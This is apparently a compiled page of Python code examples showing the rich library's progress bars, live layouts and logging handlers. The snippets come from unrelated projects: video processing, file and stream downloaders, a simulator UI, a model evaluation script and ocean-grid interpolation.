        if (input_path is None and camera is None) or (input_path is not None
                                                       and camera is not None):
            raise ValueError(
                "You must set either 'camera' or 'input_path' arguments when setting 'Video' class"
            )
        if camera is not None and type(camera) is not int:
            raise ValueError(
                "Argument 'camera' refers to the device-id of your camera, and must be an int. Setting it to 0 usually works if you don't know the id."
            )

        # Read Input Video
        if self.input_path is not None:
            if "~" in self.input_path:
                self.input_path = os.path.expanduser(self.input_path)
            if not os.path.isfile(self.input_path):
                self._fail(
                    f"[bold red]Error:[/bold red] File '{self.input_path}' does not exist."
                )
            self.video_capture = cv2.VideoCapture(self.input_path)
            total_frames = int(self.video_capture.get(
                cv2.CAP_PROP_FRAME_COUNT))
            if total_frames == 0:
                self._fail(
                    f"[bold red]Error:[/bold red] '{self.input_path}' does not seem to be a video file supported by OpenCV. If the video file is not the problem, please check that your OpenCV installation is working correctly."
                )
            description = os.path.basename(self.input_path)
        else:
            self.video_capture = cv2.VideoCapture(self.camera)
            total_frames = 0
            description = f"Camera({self.camera})"
        self.output_fps = (output_fps if output_fps is not None else
                           self.video_capture.get(cv2.CAP_PROP_FPS))
        self.input_height = self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)
        self.input_width = self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)
        self.frame_counter = 0

        # Setup progressbar
        if self.label:
            description += f" | {self.label}"
        progress_bar_fields: List[Union[str, ProgressColumn]] = [
            "[progress.description]{task.description}",
            BarColumn(),
            "[yellow]{task.fields[process_fps]:.2f}fps[/yellow]",
        ]
        if self.input_path is not None:
            progress_bar_fields.insert(
                2, "[progress.percentage]{task.percentage:>3.0f}%")
            progress_bar_fields.insert(
                3,
                TimeRemainingColumn(),
            )
        self.progress_bar = Progress(
            *progress_bar_fields,
            auto_refresh=False,
            redirect_stdout=False,
            redirect_stderr=False,
        )
        self.task = self.progress_bar.add_task(
            self.abbreviate_description(description),
            total=total_frames,
            start=self.input_path is not None,
            process_fps=0,
        )

    # This is a generator, note the yield keyword below.
    def __iter__(self):
        with self.progress_bar as progress_bar:
            start = time.time()

            # Iterate over video
            while True:
                self.frame_counter += 1
                ret, frame = self.video_capture.read()
                if ret is False or frame is None:
                    break
                process_fps = self.frame_counter / (time.time() - start)
                progress_bar.update(self.task,
                                    advance=1,
                                    refresh=True,
                                    process_fps=process_fps)
                yield frame

        # Cleanup
        if self.output_video is not None:
            self.output_video.release()
            print(
                f"[white]Output video file saved to: {self.get_output_file_path()}[/white]"
            )
        self.video_capture.release()
        cv2.destroyAllWindows()

    def _fail(self, msg: str):
        print(msg)
        exit()

    def write(self, frame: np.ndarray) -> int:
        if self.output_video is None:
            # The user may need to access the output file path on their code
            output_file_path = self.get_output_file_path()
            fourcc = cv2.VideoWriter_fourcc(
                *self.get_codec_fourcc(output_file_path))
            # Set on first frame write in case the user resizes the frame in some way
            output_size = (
                frame.shape[1],
                frame.shape[0],
            )  # OpenCV format is (width, height)
            self.output_video = cv2.VideoWriter(
                output_file_path,
                fourcc,
                self.output_fps,
                output_size,
            )

        self.output_video.write(frame)
        return cv2.waitKey(1)

    def show(self, frame: np.ndarray, downsample_ratio: int = 1) -> int:
        # Resize to lower resolution for faster streaming over slow connections
        if downsample_ratio is not None:
            # Note that frame.shape[1] corresponds to width, and opencv format is (width, height)
            frame = cv2.resize(
                frame,
                (
                    frame.shape[1] // downsample_ratio,
                    frame.shape[0] // downsample_ratio,
                ),
            )
        cv2.imshow("Output", frame)
        return cv2.waitKey(1)

    def get_output_file_path(self) -> str:
        output_path_is_dir = os.path.isdir(self.output_path)
        if output_path_is_dir and self.input_path is not None:
            base_file_name = self.input_path.split("/")[-1].split(".")[0]
            file_name = base_file_name + "_out.mp4"
            return os.path.join(self.output_path, file_name)
        elif output_path_is_dir and self.camera is not None:
            file_name = f"camera_{self.camera}_out.mp4"
            return os.path.join(self.output_path, file_name)
        else:
            return self.output_path

    def get_codec_fourcc(self, filename: str) -> Optional[str]:
        if self.codec_fourcc is not None:
            return self.codec_fourcc

        # Default codecs for each extension
        extension = filename[-3:].lower()
        if "avi" == extension:
            return "XVID"
        elif "mp4" == extension:
            return "mp4v"  # When available, "avc1" is better
        else:
            self._fail(
                f"[bold red]Could not determine video codec for the provided output filename[/bold red]: "
                f"[yellow]{filename}[/yellow]\n"
                f"Please use '.mp4', '.avi', or provide a custom OpenCV fourcc codec name."
            )
            return None  # Had to add this return to make mypy happy. I don't like this.

    def abbreviate_description(self, description: str) -> str:
        """Conditionally abbreviate description so that progress bar fits in small terminals"""
        terminal_columns, _ = get_terminal_size()
        space_for_description = (int(terminal_columns) - 25
                                 )  # Leave 25 space for progressbar
        if len(description) < space_for_description:
            return description
        else:
            return "{} ... {}".format(
                description[:space_for_description // 2 - 3],
                description[-space_for_description // 2 + 3:],
            )
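
Video.__iter__ above wraps frame capture in a generator that refreshes a custom process_fps task field on every yield. The same idea decoupled from OpenCV; frames and the range() source are stand-ins for the capture loop:

import time
from rich.progress import Progress

def frames(source, progress: Progress, task):
    # Mirror Video.__iter__: advance the bar and refresh the fps field per item.
    start = time.time()
    for n, item in enumerate(source, start=1):
        elapsed = max(time.time() - start, 1e-6)  # guard against zero division
        progress.update(task, advance=1, process_fps=n / elapsed)
        yield item

progress = Progress(
    "[progress.description]{task.description}",
    "[yellow]{task.fields[process_fps]:.2f}fps[/yellow]",
)
with progress:
    task = progress.add_task("Camera(0)", total=100, process_fps=0.0)
    for frame in frames(range(100), progress, task):
        time.sleep(0.01)  # stand-in for per-frame processing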
Example #9
    valid, files = False, []  # loop state: `valid` is set via the walrus below
    console = Console()

    with open('TERMINAL.md') as readme:
        markdown = Markdown(readme.read())

    console.print(markdown)

    while not valid:
        urls = input('Enter URL address: ')

        for url in urls.split(','):
            path = pathlib.PurePath(url)
            name, suffix = path.name, path.suffix
            extension = suffix if suffix in VALID_IMAGE_EXTENSIONS else False

            if valid := validate_url(url, extension):
                files.append((url, name))

    progress = Progress(
        '[progress.description]{task.description}',
        BarColumn(),
        '[magenta]{task.completed} of {task.total} files downloaded',
        TimeRemainingColumn()
    )

    with progress:
        task = progress.add_task("Downloading files...", total=len(files))
        for image_url, name in files:
            download(image_url, name)
            progress.update(task, advance=1)
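
For a simple per-item loop like the one above, rich also ships a track() helper that builds the Progress and task in one call. An equivalent of the download loop, with the network call replaced by a sleep and placeholder URLs:

import time
from rich.progress import track

files = [("https://example.com/a.png", "a.png"),
         ("https://example.com/b.png", "b.png")]
for image_url, name in track(files, description="Downloading files..."):
    time.sleep(0.2)  # stand-in for download(image_url, name)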
Example #10
progress = Progress(
    BarColumn(bar_width=None),
    "[progress.percentage]{task.percentage:>3.1f}%",
    "•",
    DownloadColumn(),
    "•",
    TransferSpeedColumn(),
    "•",
    TimeRemainingColumn(),
)


# progress = Progress(
#     "[progress.description]{task.description}",
#     BarColumn(),
#     "[progress.percentage]{task.percentage:>3.0f}%",
#     TimeRemainingColumn(),
# )

A = 0
with progress:

    task1 = progress.add_task("[red]Downloading...", A=A, total=1000)
    task2 = progress.add_task("[green]Processing...", A=A, total=1000)
    task3 = progress.add_task("[cyan]Cooking...", A=A, total=1000)

    while not progress.finished:
        A += 1
        progress.update(task1, advance=0.5)
        progress.update(task2, advance=0.3)
        progress.update(task3, advance=0.9)
        time.sleep(0.02)
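
Note that the custom A field above is attached to every task but never rendered or refreshed, so it has no visible effect. For a task field to be useful it needs a column that formats it and update() calls that keep it current, as in this sketch:

import time
from rich.progress import BarColumn, Progress, TextColumn

progress = Progress(
    TextColumn("[bold]{task.description}"),
    BarColumn(),
    TextColumn("pass {task.fields[A]}"),  # actually render the custom field
)
with progress:
    task = progress.add_task("Working...", total=100, A=0)
    for i in range(100):
        progress.update(task, advance=1, A=i)  # keep the field current
        time.sleep(0.01)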
Example #11
class Downloader:
    def __init__(self, args: CmdArgs):
        self.logger = logging.getLogger('downloader')
        self.args = args
        self.exit = False
        # <--- settings from the command line --->
        self.max_concurrent_downloads = 1
        # <--- progress bar --->
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[name]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.2f}%", "•",
            DownloadColumn(binary_units=True), "•", TransferSpeedColumn(), "•",
            TimeRemainingColumn())
        self.terminate = False
        signal.signal(signal.SIGINT, self.stop)
        signal.signal(signal.SIGTERM, self.stop)

    def stop(self, signum: int, frame):
        self.terminate = True

    def get_conn(self):
        '''
        A connector may be closed after a ClientSession has used it;
        build a fresh one whenever another session is needed.
        '''
        return TCPConnector(
            ttl_dns_cache=300,
            ssl=False,
            limit_per_host=self.args.limit_per_host,
            limit=500,
            force_close=not self.args.disable_force_close,
            enable_cleanup_closed=not self.args.disable_force_close)

    def daemon(self):
        '''
        Loop forever, scheduling downloads and updating progress.
        '''
        if self.args.repl is False:
            self.download_stream()
            return
        while self.exit:  # placeholder REPL loop; exits immediately
            break

    def download_stream(self):
        extractor = Extractor(self.args)
        streams = extractor.fetch_metadata(self.args.URI[0])
        loop = get_event_loop()
        loop.run_until_complete(self.download_all_segments(loop, streams))
        loop.close()

    def get_selected_index(self, length: int) -> list:
        selected = []
        try:
            text = input('Enter the number(s) of the stream(s) to download:\n').strip()
        except EOFError:
            click.secho('No stream selected; exiting.')
            return []
        if text == '':
            return [index for index in range(length + 1)]
        elif text.isdigit():
            return [int(text)]
        elif '-' in text and len(text.split('-')) == 2:
            start, end = text.split('-')
            if start.strip().isdigit() and end.strip().isdigit():
                return [
                    index for index in range(int(start.strip()),
                                             int(end.strip()) + 1)
                ]
        elif text.replace(' ', '').isdigit():
            for index in text.split(' '):
                if index.strip().isdigit():
                    if int(index.strip()) <= length:
                        selected.append(int(index))
            return selected
        elif text.replace(',', '').replace(' ', '').isdigit():
            for index in text.split(','):
                if index.strip().isdigit():
                    if int(index.strip()) <= length:
                        selected.append(int(index))
            return selected
        return selected

    async def download_all_segments(self, loop: AbstractEventLoop,
                                    streams: List[Stream]):
        if streams is None:
            return
        if len(streams) == 0:
            return
        for index, stream in enumerate(streams):
            stream.show_info(index)
        if self.args.select is True:
            selected = self.get_selected_index(len(streams))
        else:
            selected = [index for index in range(len(streams) + 1)]
        all_results = []
        for index, stream in enumerate(streams):
            if self.terminate is True:
                break
            if index not in selected:
                continue
            click.secho(f'{stream.get_name()} download start.')
            stream.dump_segments()
            max_failed = 5
            while max_failed > 0:
                results = await self.do_with_progress(loop, stream)
                all_results.append(results)
                count_none, count_true, count_false = 0, 0, 0
                for _, flag in results.items():
                    if flag is True:
                        count_true += 1
                    elif flag is False:
                        count_false += 1
                    else:
                        count_none += 1
                # any False means the stream cannot be downloaded
                if count_false > 0:
                    break
                # no False: any None means segments remain to retry; otherwise merge
                if count_none > 0:
                    max_failed -= 1
                    continue
                else:
                    # if stream.stream_type == 'text':
                    #     # text streams in an mpd are usually direct subtitle links; skip merging
                    #     pass
                    if self.args.disable_auto_concat is False:
                        stream.concat(self.args)
                    break
        return all_results

    def get_left_segments(self, stream: Stream):
        completed = 0
        _left_segments = []
        for segment in stream.segments:
            segment_path = segment.get_path()
            if segment_path.exists() is True:
                # the file is on disk, so its download definitely succeeded
                if segment_path.stat().st_size == 0:
                    segment_path.unlink()
                else:
                    completed += segment_path.stat().st_size
                    continue
            _left_segments.append(segment)
        return completed, _left_segments

    def init_progress(self, stream: Stream, completed: int):
        stream_id = self.progress.add_task("download",
                                           name=stream.get_name(),
                                           start=False)  # TaskID
        if completed > 0:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = completed
                stream.filesize = total
            self.progress.update(stream_id, completed=completed, total=total)
        else:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = 0
                stream.filesize = total
            self.progress.update(stream_id, total=total)
        return stream_id

    async def do_with_progress(self, loop: AbstractEventLoop, stream: Stream):
        '''
        Report progress while downloading and handle exceptions sensibly.
        '''
        results = {}  # type: Dict[Segment, Optional[bool]]
        tasks = set()  # type: Set[Task]

        def _done_callback(_future: Future) -> None:
            nonlocal results
            if _future.exception() is None:
                segment, status, flag = _future.result()
                if flag is None:
                    pass
                    # print('Known exception during download; segment needs to be retried\n')
                elif flag is False:
                    # known fatal cases (bad status code, missing Content-Length) mean the stream cannot be downloaded, so bail out
                    cancel_all_task()
                    if status in ['STATUS_CODE_ERROR', 'NO_CONTENT_LENGTH']:
                        print(f'm3u8 cannot be downloaded ({status}); cancelling the other tasks\n')
                    elif status == 'EXIT':
                        pass
                    else:
                        print(f'Unknown status -> {status}; cancelling the other tasks\n')
                results[segment] = flag
            else:
                # unknown exception: force-cancel every task
                print('Unknown exception; cancelling all tasks\n')
                cancel_all_task()
                results['unknown segment'] = False

        def cancel_all_task() -> None:
            for task in tasks:
                task.remove_done_callback(_done_callback)
            for task in filter(lambda task: not task.done(), tasks):
                task.cancel()

        # tune limit_per_host to the site and network conditions; with good connectivity to the target, a smaller value tends to work better
        completed, _left = self.get_left_segments(stream)
        if len(_left) == 0:
            return results
        # nothing left to download, so try to merge; a False return means the download still has to be completed
        with self.progress:
            stream_id = self.init_progress(stream, completed)
            client = ClientSession(
                connector=self.get_conn())  # type: ClientSession
            for segment in _left:
                task = loop.create_task(
                    self.download(client, stream_id, stream, segment))
                task.add_done_callback(_done_callback)
                tasks.add(task)
            # block until every task has finished
            finished, unfinished = await asyncio.wait(tasks)
            # close the ClientSession
            await client.close()
        return results

    async def download(self, client: ClientSession, stream_id: TaskID,
                       stream: Stream, segment: Segment):
        proxy, headers = self.args.proxy, self.args.headers
        status, flag = 'EXIT', True
        try:
            async with client.get(
                    segment.url, proxy=proxy,
                    headers=headers) as resp:  # type: ClientResponse
                _flag = True
                if resp.status == 405:
                    status = 'STATUS_CODE_ERROR'
                    flag = False
                if resp.headers.get('Content-length') is not None:
                    stream.filesize += int(resp.headers["Content-length"])
                    self.progress.update(stream_id, total=stream.filesize)
                else:
                    _flag = False
                if flag:
                    self.progress.start_task(stream_id)
                    while self.terminate is False:
                        data = await resp.content.read(512)
                        if not data:
                            break
                        segment.content.append(data)
                        self.progress.update(stream_id, advance=len(data))
                        if _flag is False:
                            stream.filesize += len(data)
                            self.progress.update(stream_id,
                                                 total=stream.filesize)
        except TimeoutError:
            return segment, 'TimeoutError', None
        except client_exceptions.ClientConnectorError:
            return segment, 'ClientConnectorError', None
        except client_exceptions.ClientPayloadError:
            return segment, 'ClientPayloadError', None
        except client_exceptions.ClientOSError:
            return segment, 'ClientOSError', None
        except client_exceptions.InvalidURL:
            return segment, 'EXIT', False
        except CancelledError:
            return segment, 'EXIT', False
        except Exception as e:
            self.logger.error(f'! -> {segment.url}', exc_info=e)
            return segment, status, False
        if self.terminate:
            return segment, 'EXIT', False
        if flag is False:
            return segment, status, False
        return segment, 'SUCCESS', await self.decrypt(segment)

    async def decrypt(self, segment: Segment) -> bool:
        '''
        Decryption step
        '''
        if self.args.disable_auto_decrypt is True:
            return segment.dump()
        if segment.is_encrypt() and segment.is_supported_encryption():
            cipher = CommonAES(segment.xkey.key,
                               binascii.a2b_hex(segment.xkey.iv))
            return cipher.decrypt(segment)
        else:
            return segment.dump()
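# Not part of the original example: the Downloader above adds its progress task
# with start=False and only calls start_task() once a total is known, so the
# speed/ETA clocks don't run while waiting for the first response. A minimal,
# self-contained sketch of that pattern, assuming only the rich API:
if __name__ == '__main__':
    import time
    from rich.progress import BarColumn, DownloadColumn, Progress, TextColumn

    demo = Progress(TextColumn("{task.fields[name]}"),
                    BarColumn(bar_width=None), DownloadColumn())
    with demo:
        task_id = demo.add_task("download", name="demo", start=False)
        demo.update(task_id, total=1024)  # total learned from Content-Length
        demo.start_task(task_id)          # now the speed/ETA clock begins
        for _ in range(8):
            demo.update(task_id, advance=128)
            time.sleep(0.05)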
Exemplo n.º 12
0
def main(
    timeline_spec: str,
    *,
    seed: str,
    fake_rate: str,
    iterations: int,
    genuine_rate: str,
    timeline_type: TimelineType,
    topology_type: TopologyType,
) -> None:
    timeline_spec = tuple(map(int, timeline_spec.split(",")))
    timeline_size = len(timeline_spec) - 1
    if timeline_size < 1:
        raise ValueError("Timeline have at least 2 values")

    fake_rate = tuple(map(float, fake_rate.split(",")))
    genuine_rate = tuple(map(float, genuine_rate.split(",")))
    if len(fake_rate) != 2 or len(genuine_rate) != 2:
        raise ValueError("fake_rate and genuine_rate must have two entries")

    timeline = []
    template = [EventType.Fake for _ in range(timeline_size)]
    for pos, spec in enumerate(timeline_spec):
        timeline += [template[:] for _ in range(spec)]
        template[timeline_size - (pos + 1)] = EventType.Genuine

    simulator = Simulator(
        timeline,
        timeline_type=timeline_type,
        topology_type=topology_type,
        fake_rate_heuristic=lambda _: 1,
        genuine_rate_heuristic=lambda _: 1,
        internal_fake_transmission_rate=fake_rate[0],
        external_fake_transmission_rate=fake_rate[1],
        internal_genuine_transmission_rate=genuine_rate[0],
        external_genuine_transmission_rate=genuine_rate[1],
    )

    if seed:
        simulator.load_seed(seed)

    # === GUI Setup === #
    layout = Layout(name="root")

    layout.split(
        Layout(name="header", ratio=7),
        Layout(name="info", ratio=15),
        Layout(name="stats", ratio=10),
        Layout(name="footer", ratio=1),
    )

    layout["header"].update(Panel(simulator, title="Simulator"))

    infos_table: ReversedTable

    def setup_info_table() -> None:
        nonlocal infos_table
        infos_table = ReversedTable(
            Column("Time", style="dim"),
            "Type",
            "Origin",
            title="Events",
            expand=True,
            show_header=True,
            header_style="bold white",
        )
        layout["info"].update(infos_table)

    setup_info_table()

    stats_table: ReversedTable

    def setup_stats_table(*headers: T.Union[Column, str]) -> None:
        nonlocal stats_table
        stats_table = ReversedTable(
            *headers,
            title="Timeline Distribution",
            expand=True,
            show_header=True,
        )
        layout["stats"].update(stats_table)

    setup_stats_table()

    if iterations == 0:
        progress: T.Union[str, Progress] = "Press CTRL+C to exit..."
        progress_task: T.Optional[TaskID] = None
    else:
        progress = Progress(expand=True)
        progress_task = progress.add_task("[white]Simulating...",
                                          total=iterations)
    # FIXME: Rich has wrong typing definition
    layout["footer"].update(T.cast(RenderableType, progress))

    with Live(layout,
              refresh_per_second=10,
              screen=True,
              redirect_stdout=False,
              redirect_stderr=False):
        with suppress(KeyboardInterrupt):
            for time, event, stats in simulator:
                if 0 < iterations <= simulator.iteration:
                    break

                infos_table.add_row(str(time), event.type.name,
                                    event.origin.name)

                keys = tuple(sorted(key for key in stats.keys()))
                stats_columns = tuple("".join(key.name[0]
                                              for key in state_keys)
                                      for state_keys in keys)
                if len(stats_columns) != len(stats_table.columns):
                    setup_stats_table(*stats_columns)

                stats_table.add_row(*(Pretty(stats[key]) for key in keys))

                if isinstance(progress,
                              Progress) and progress_task is not None:
                    progress.update(progress_task, advance=1)

            layout["footer"].update("Press enter key to exit...")
            input()

    print("Seed:", simulator.seed)
Exemplo n.º 13
0
                       'Custom_02': '/Data/enningxie/Codes/Notebooks/data/test_df_0509.tsv',
                       'Custom_03': '/Data/enningxie/Codes/Notebooks/data/test_df_0511.tsv',
                       'Custom_04': '/Data/enningxie/Codes/Notebooks/data/test_df_0515.tsv'}
data_2_model = defaultdict(dict)
with tmp_progress_part:
    for model_name in tmp_ptm_short_names:
        tmp_saved_model_path = '/Data/enningxie/Codes/transformers_xz/saved_models/{}/{}'.format(models_folder,
                                                                                                 model_name)
        tmp_spc_obj = SequencePairClassification(model_name,
                                                 num_labels=1,
                                                 max_length=64,
                                                 saved_model_path=tmp_saved_model_path)
        # console.print(f"----------------{model_name}--------------------", style='info')
        for data_type, valuable_data_path in valuable_data_paths.items():
            tmp_model_2_metrics = dict()
            tmp_task_id = tmp_progress_part.add_task("Evaluate-models", model_name=model_name,
                                                     data_type=data_type, total=99)
            valuable_df = pd.read_csv(valuable_data_path, sep='\t')
            tmp_batch_text_pairs = []
            tmp_label = []
            for _, tmp_row in valuable_df.iterrows():
                tmp_batch_text_pairs.append((tmp_row.sentence1, tmp_row.sentence2))
                tmp_label.append(tmp_row.label)
            trained_model = tmp_spc_obj.get_trained_model()
            tmp_start_time = time.perf_counter()
            tmp_pred = tmp_spc_obj.predict_op(trained_model, tmp_batch_text_pairs)
            # print(f'Total cost time: {time.perf_counter() - tmp_start_time}')
            tmp_threshold = 0.01
            best_threshold = tmp_threshold
            best_precision = 0.0
            best_recall = 0.0
            best_f1_score = 0.0
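# Not part of the original example: the fragment above is truncated mid-loop,
# but it clearly sets up a decision-threshold sweep over tmp_pred. A hedged
# sketch of such a sweep, assuming scikit-learn metrics and binary labels
# (all names below are hypothetical):
from sklearn.metrics import f1_score, precision_score, recall_score

def sweep_thresholds(scores, labels, step=0.01):
    """Return the threshold in (0, 1) that maximizes F1 on the given scores."""
    best = {'threshold': step, 'precision': 0.0, 'recall': 0.0, 'f1': 0.0}
    threshold = step
    while threshold < 1.0:
        preds = [int(score >= threshold) for score in scores]
        f1 = f1_score(labels, preds, zero_division=0)
        if f1 > best['f1']:
            best = {'threshold': threshold,
                    'precision': precision_score(labels, preds, zero_division=0),
                    'recall': recall_score(labels, preds, zero_division=0),
                    'f1': f1}
        threshold += step
    return best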
Exemplo n.º 14
0
class DeviantArtDownloader:
    def __init__(self, client_id, client_secret):
        self.api = Api(client_id, client_secret)
        self.progress = Progress(
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            DownloadColumn(),
            TransferSpeedColumn(),
            "[bold blue]{task.fields[filename]}",
        )
        self.all_t = self.progress.add_task('All', filename='All', start=False)
        self.total_length = 0

    def download_worker(self, task_id, url, path):
        with open(path, 'wb') as f, GET(url, stream=True) as rq:
            length = int(rq.headers.get('Content-Length', 0))
            self.progress.start_task(task_id)
            self.progress.update(task_id, total=length)
            self.total_length += length
            self.progress.update(self.all_t, total=self.total_length)
            for chunk in rq.iter_content(chunk_size=4096):
                f.write(chunk)
                self.progress.update(task_id, advance=len(chunk))
                self.progress.update(self.all_t, advance=len(chunk))
        return task_id
    
    def search_content(self, tag, max_items=-1):
        n_items = 0
        offset = 0
        while True:
            data = self.api.browse('tags', tag=tag, offset=offset)
            for item in data['results']:
                yield item
                n_items += 1
                if 0 < max_items <= n_items:
                    return
            if not data['has_more']:
                break
            offset = data['next_offset']
            
    @staticmethod
    def _make_filename(item):
        src = item.content['src']
        ext = splitext(urlparse(src).path)[1]
        return splitpath(item.url)[1] + ext

    def download(self,
                 tag,
                 out_dir='.',
                 max_items=-1,
                 max_workers=8,
                 list_path=None):
        if not exists(out_dir):
            mkdir(out_dir)
        with self.progress, ThreadPoolExecutor(max_workers=max_workers) as pool:
            self.progress.start_task(self.all_t)
            futures = []
            for item in self.search_content(tag, max_items):
                if list_path:
                    with open(list_path, 'a') as flist:
                        flist.write(item.url + '\n')
                if not item.content:
                    continue
                filename = join(out_dir, self._make_filename(item))
                task_id = self.progress.add_task(
                        'download',
                        filename=item.title,
                        start=False)

                url = item.content['src']
                f = pool.submit(self.download_worker, task_id, url, filename)
                futures.append(f)
                while len(futures) >= max_workers:
                    # iterate over a copy: removing items from the list while
                    # iterating it directly would skip elements
                    for f in futures[:]:
                        if f.done():
                            futures.remove(f)
                            self.progress.remove_task(f.result())
                    sleep(0.1)
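# Not part of the original example: a usage sketch for DeviantArtDownloader;
# the client credentials, tag, and paths below are placeholders:
if __name__ == '__main__':
    downloader = DeviantArtDownloader('my_client_id', 'my_client_secret')
    downloader.download('landscape',
                        out_dir='downloads',
                        max_items=20,
                        max_workers=4,
                        list_path='downloaded_urls.txt')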
Exemplo n.º 15
0
class RichLogger(object):
    """Defines a logger based on `rich.RichHandler`.

    Compared to the basic Logger, this logger will decorate the log message in
    a pretty format automatically.
    """
    def __init__(self,
                 work_dir=DEFAULT_WORK_DIR,
                 logfile_name='log.txt',
                 logger_name='logger'):
        """Initializes the logger.

        Args:
            work_dir: The work directory. (default: DEFAULT_WORK_DIR)
            logfile_name: Name of the log file. (default: `log.txt`)
            logger_name: Unique name for the logger. (default: `logger`)
        """
        self.logger = logging.getLogger(logger_name)
        if self.logger.hasHandlers():  # Already exists
            raise SystemExit(
                f'Logger `{logger_name}` already exists!\n'
                f'Please use another name, otherwise messages from the '
                f'two loggers may get mixed up.')

        self.logger.setLevel(logging.DEBUG)

        # Print log message with `INFO` level or above onto the screen.
        terminal_console = Console(file=sys.stderr,
                                   log_time=False,
                                   log_path=False)
        terminal_handler = RichHandler(level=logging.INFO,
                                       console=terminal_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
        terminal_handler.setFormatter(logging.Formatter('%(message)s'))
        self.logger.addHandler(terminal_handler)

        # Save log message with all levels into log file if needed.
        if logfile_name:
            os.makedirs(work_dir, exist_ok=True)
            file_stream = open(os.path.join(work_dir, logfile_name), 'a')
            file_console = Console(file=file_stream,
                                   log_time=False,
                                   log_path=False)
            file_handler = RichHandler(level=logging.DEBUG,
                                       console=file_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
            file_handler.setFormatter(logging.Formatter('%(message)s'))
            self.logger.addHandler(file_handler)

        self.log = self.logger.log
        self.debug = self.logger.debug
        self.info = self.logger.info
        self.warning = self.logger.warning
        self.error = self.logger.error
        self.exception = self.logger.exception
        self.critical = self.logger.critical

        self.pbar = None

    def print(self, *messages, **kwargs):
        """Prints messages without time stamp or log level."""
        for handler in self.logger.handlers:
            handler.console.print(*messages, **kwargs)

    def init_pbar(self, leave=False):
        """Initializes a progress bar which will display on the screen only.

        Args:
            leave: Whether to leave the trace. (default: False)
        """
        assert self.pbar is None

        # Columns shown in the progress bar.
        columns = (
            TextColumn("[progress.description]{task.description}"),
            BarColumn(bar_width=None),
            TextColumn("[progress.percentage]{task.percentage:>5.1f}%"),
            TimeColumn(),
        )

        self.pbar = Progress(*columns,
                             console=self.logger.handlers[0].console,
                             transient=not leave,
                             auto_refresh=True,
                             refresh_per_second=10)
        self.pbar.start()

    def add_pbar_task(self, name, total):
        """Adds a task to the progress bar.

        Args:
            name: Name of the new task.
            total: Total number of steps (samples) contained in the task.

        Returns:
            The task ID.
        """
        assert isinstance(self.pbar, Progress)
        task_id = self.pbar.add_task(name, total=total)
        return task_id

    def update_pbar(self, task_id, advance=1):
        """Updates a certain task in the progress bar.

        Args:
            task_id: ID of the task to update.
            advance: Number of steps advanced onto the target task. (default: 1)
        """
        assert isinstance(self.pbar, Progress)
        if self.pbar.tasks[int(task_id)].finished:
            if self.pbar.tasks[int(task_id)].stop_time is None:
                self.pbar.stop_task(task_id)
        else:
            self.pbar.update(task_id, advance=advance)

    def close_pbar(self):
        """Closes the progress bar"""
        assert isinstance(self.pbar, Progress)
        self.pbar.stop()
        self.pbar = None
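# Not part of the original example: a usage sketch for RichLogger; the work
# directory, task name, and step count are illustrative:
if __name__ == '__main__':
    logger = RichLogger(work_dir='work_dirs/demo', logger_name='demo_logger')
    logger.info('Starting demo run.')
    logger.init_pbar()
    task_id = logger.add_pbar_task('demo task', total=100)
    for _ in range(100):
        logger.update_pbar(task_id, advance=1)
    logger.close_pbar()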
Exemplo n.º 16
0
def __interp_grids(src_grid,
                   child_grid,
                   ncsrc,
                   ncout,
                   records=None,
                   threads=2,
                   nx=0,
                   ny=0,
                   weight=10,
                   vmap=None,
                   z_mask=False,
                   pmap=None):
    """
    internal method:  Given a model file (average, history, etc.),
    interpolate the fields onto another gridded file.

    Parameters
    ----------
    src_grid : seapy.model.grid data of source
    child_grid : seapy.model.grid output data grid
    ncsrc : netcdf input file  (History, Average, etc. file)
    ncout : netcdf output file
    [records] : array of the record indices to interpolate
    [threads] : number of processing threads
    [nx] : decorrelation length in grid-cells for x
    [ny] : decorrelation length in grid-cells for y
    [vmap] : variable name mapping
    [z_mask] : mask out depths in z-grids
    [pmap] : use the specified pmap rather than compute it

    Returns
    -------
    None

    """
    # If we don't have a variable map, then do a one-to-one mapping
    if vmap is None:
        vmap = dict()
        for k in seapy.roms.fields:
            vmap[k] = k

    # Generate a file to store the pmap information
    sname = getattr(src_grid, 'name', None)
    cname = getattr(child_grid, 'name', None)
    pmap_file = None if any(v is None for v in (sname, cname)) else \
        sname + "_" + cname + "_pmap.npz"

    # Create or load the pmaps depending on if they exist
    if nx == 0:
        if hasattr(src_grid, "dm") and hasattr(child_grid, "dm"):
            nx = np.ceil(np.ma.mean(src_grid.dm) / np.ma.mean(child_grid.dm))
        else:
            nx = 5
    if ny == 0:
        if hasattr(src_grid, "dn") and hasattr(child_grid, "dn"):
            ny = np.ceil(np.ma.mean(src_grid.dn) / np.ma.mean(child_grid.dn))
        else:
            ny = 5

    if pmap is None:
        if pmap_file is not None and os.path.isfile(pmap_file):
            pmap = np.load(pmap_file)
        else:
            tmp = np.ma.masked_equal(src_grid.mask_rho, 0)
            tmp, pmaprho = seapy.oasurf(src_grid.lon_rho,
                                        src_grid.lat_rho,
                                        tmp,
                                        child_grid.lon_rho,
                                        child_grid.lat_rho,
                                        weight=weight,
                                        nx=nx,
                                        ny=ny)
            tmp = np.ma.masked_equal(src_grid.mask_u, 0)
            tmp, pmapu = seapy.oasurf(src_grid.lon_u,
                                      src_grid.lat_u,
                                      tmp,
                                      child_grid.lon_rho,
                                      child_grid.lat_rho,
                                      weight=weight,
                                      nx=nx,
                                      ny=ny)
            tmp = np.ma.masked_equal(src_grid.mask_v, 0)
            tmp, pmapv = seapy.oasurf(src_grid.lon_v,
                                      src_grid.lat_v,
                                      tmp,
                                      child_grid.lon_rho,
                                      child_grid.lat_rho,
                                      weight=weight,
                                      nx=nx,
                                      ny=ny)
            if pmap_file is not None:
                np.savez(pmap_file, pmaprho=pmaprho, pmapu=pmapu, pmapv=pmapv)
            pmap = {"pmaprho": pmaprho, "pmapu": pmapu, "pmapv": pmapv}

    # Get the time field
    time = seapy.roms.get_timevar(ncsrc)

    # Interpolate the depths from the source to final grid
    src_depth = np.min(src_grid.depth_rho, 0)
